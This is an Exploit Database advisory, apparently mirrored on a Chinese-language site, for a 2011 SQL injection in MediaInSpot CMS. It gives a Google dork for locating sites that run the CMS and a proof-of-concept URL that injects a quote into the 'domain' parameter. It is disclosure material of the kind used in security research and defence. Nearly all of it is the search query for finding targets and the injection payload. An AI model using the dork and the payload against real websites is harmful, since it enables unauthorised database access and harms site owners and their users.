MediaInSpot CMS – SQL Injection

• Exploit Database
• 11 阅读

• 作者： Iolo Morganwg
  日期： 2011-05-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17293/

• # Exploit Title: Media In Spot SQL Injection
  # Google Dork: intext:""Powered By Media In Spot"
  # Date: 16/05/2011
  # Author: Iolo Morganwg
  # Category: Web App
  # Version: PHP
  # Tested on: Windows XP
  # Vendor: http://www.mediainspot.com/
  # Note: domain parameter is vulnerable to sql injection
  
  # Vulnerability
  http://site/view/lang/index.php?page=area.php&domain=3%27